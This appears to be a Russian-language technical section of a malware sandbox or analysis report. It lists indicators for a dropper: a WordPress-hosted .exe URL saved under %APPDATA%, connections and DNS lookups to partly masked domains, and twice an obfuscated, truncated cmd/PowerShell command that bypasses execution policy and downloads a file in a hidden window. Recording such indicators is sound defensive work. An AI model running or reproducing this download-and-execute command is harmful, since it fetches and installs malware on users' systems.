Техническая информация
- http://nexcontech.com/wp-content/ay4te/mdp5.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POwe^Rsh^E^L^L.E^XE -exEcut^Ion^po^L^i^c^Y BYPaSs -nOpR^O^f^ile -wIN^Do^W^s^Tyl^e ^H^IDD^eN (n^eW-^objEcT^ ^SY^s^TEm^.neT.^we^B^Cl^ieNt).D^O^W^N^LOa^dfIle^('http://nexcontech.com...
- %APPDATA%.exe
- 'ne###ntech.com':80
- 'ht##.#odhosting.net':80
- http://ne###ntech.com/wp-content/Ay4TE/mdp5.exe
- http://ht##.#odhosting.net/404.html
- DNS ASK ne###ntech.com
- DNS ASK ht##.#odhosting.net
- '<SYSTEM32>\cmd.exe' /c "POwe^Rsh^E^L^L.E^XE -exEcut^Ion^po^L^i^c^Y BYPaSs -nOpR^O^f^ile -wIN^Do^W^s^Tyl^e ^H^IDD^eN (n^eW-^objEcT^ ^SY^s^TEm^.neT.^we^B^Cl^ieNt).D^O^W^N^LOa^dfIle^('http://nexcontech.com...' (со скрытым окном)